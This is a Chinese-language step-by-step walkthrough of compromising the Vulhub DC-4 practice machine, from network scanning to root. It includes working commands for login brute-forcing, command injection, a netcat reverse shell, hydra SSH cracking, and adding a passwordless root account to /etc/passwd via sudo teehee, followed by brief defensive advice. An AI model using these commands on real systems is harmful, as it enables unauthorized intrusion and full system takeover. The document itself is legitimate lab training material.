Vulhub DC-4靶机渗透测试完整复现教程<\/h1>

一、环境准备<\/h2>

1. 工具与设备<\/h3>

Kali Linux攻击机<\/strong>：IP地址192.168.200.4<\/li>
DC-4靶机<\/strong>：IP地址未知（需通过扫描发现）<\/li>

网络配置<\/strong>：两台机器必须使用相同的网络连接方式（本教程使用NAT模式）<\/li> <\/ul>
二、信息收集阶段<\/h2>
1. 主机发现<\/h3>
使用以下两种方法发现靶机IP：<\/p>
# 方法一：ARP扫描<\/span> <\/span><\/span>arp-scan -l <\/span><\/span> <\/span><\/span># 方法二：Nmap Ping扫描<\/span> <\/span><\/span>nmap -sP 192.168.200.0\/24 -T4 <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 发现靶机IP后（假设为192.168.200.9），进行详细端口扫描：<\/p> nmap -sV -p- 192.168.200.9 <\/span><\/span><\/code><\/pre>3. Web应用探测<\/h3> 使用浏览器访问靶机Web服务<\/li> 使用whatweb进行指纹识别：<\/li> <\/ul> whatweb http:\/\/192.168.200.9 <\/span><\/span><\/code><\/pre>三、Web应用渗透<\/h2> 1. 密码爆破<\/h3> 发现登录页面需要admin凭证<\/li> 使用暴力破解获得密码：happy<\/code><\/li> <\/ul> 2. 命令注入漏洞<\/h3> 登录后发现可执行命令的功能<\/li> 使用Burp Suite拦截请求，发现执行的是ls<\/code>命令<\/li> 尝试注入其他命令： whoami<\/code><\/li> ip addr<\/code><\/li> <\/ul> <\/li> <\/ul> 四、获取初始立足点<\/h2> 1. 反弹Shell<\/h3> 在Kali上启动监听：<\/p> nc -lvvp 8899<\/span> <\/span><\/span><\/code><\/pre><\/li> 通过命令注入执行反弹Shell：<\/p> nc 192.168.200.3 8899 -e \/bin\/bash <\/code><\/pre> <\/li> 获取低权限Shell后，升级为交互式Shell：<\/p> python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. 横向移动<\/h3> 在\/home<\/code>目录发现三个用户：charles、jim、sam<\/li> 在jim目录下发现old-passowrd.bak<\/code>文件<\/li> 使用hydra爆破jim的SSH密码： hydra -l jim -P \/home\/kali\/123.txt ssh:\/\/192.168.200.9 <\/span><\/span><\/code><\/pre>获得凭证：jim\/jibril04<\/li> <\/ul> 3. 获取charles凭证<\/h3> 检查\/var\/mail<\/code>目录<\/li> 发现charles的邮件，包含密码：^xHhA&hvim0y<\/code><\/li> 切换用户： su charles <\/span><\/span><\/code><\/pre><\/li> <\/ul> 五、权限提升<\/h2> 1. 检查sudo权限<\/h3> sudo -l <\/span><\/span><\/code><\/pre>发现可以使用teehee<\/code>命令且不需要密码<\/p> 2. 利用teehee提权<\/h3> 添加root权限用户：<\/p> echo "admin::0:0:::\/bin\/bash"<\/span> | sudo teehee -a \/etc\/passwd <\/span><\/span><\/code><\/pre> 用户名：admin<\/li> UID\/GID设置为0（root权限）<\/li> 无密码<\/li> <\/ul> <\/li> 切换到admin用户：<\/p> su admin <\/span><\/span><\/code><\/pre><\/li> <\/ol> 六、关键点总结<\/h2> 信息收集<\/strong>：ARP和Nmap扫描是发现目标的基础<\/p> <\/li> Web渗透<\/strong>：密码爆破和命令注入是突破口<\/p> <\/li> 权限提升路径<\/strong>：<\/p> Web命令注入→低权限Shell<\/li> 密码爆破→jim用户<\/li> 邮件信息→charles用户<\/li> Sudo滥用→root权限<\/li> <\/ul> <\/li> 提权技巧<\/strong>：<\/p> 利用可写\/etc\/passwd的特性添加root用户<\/li> 注意teehee<\/code>命令的-a参数等同于>><\/code>重定向<\/li> <\/ul> <\/li> <\/ol> 七、防御建议<\/h2> 加强密码策略，避免使用弱密码<\/li> 限制sudo权限，避免无密码执行危险命令<\/li> 对用户输入进行严格过滤，防止命令注入<\/li> 定期检查\/var\/mail等敏感目录<\/li> 监控\/etc\/passwd文件的异常修改<\/li> <\/ol>